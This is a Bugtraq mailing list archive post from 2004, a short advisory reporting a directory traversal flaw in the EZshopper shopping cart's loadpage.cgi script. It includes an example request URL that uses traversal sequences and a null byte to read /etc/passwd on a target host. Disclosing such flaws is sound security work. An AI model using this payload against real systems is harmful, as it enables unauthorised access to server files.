Bugtraq mailing list archives
EZshopper is still vulnerable against Directory Traversal.
From: Zero_X www.lobnan.de Team <zero-x () linuxmail org>
Date: 25 Nov 2004 15:33:22 -0000
Product: EZshopper Versions: all URL: www.ahg.com Vulnerability: Directory Traversal Date: November 25, 2004 Discovered by: Zero X <Zero_X () excluded org> loadpage.cgi of EZshopper allows Directory Traversal Example: http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html - Zero X - http://www.excluded.org
Current thread:
- EZshopper is still vulnerable against Directory Traversal. Zero_X www . lobnan . de Team (Nov 25)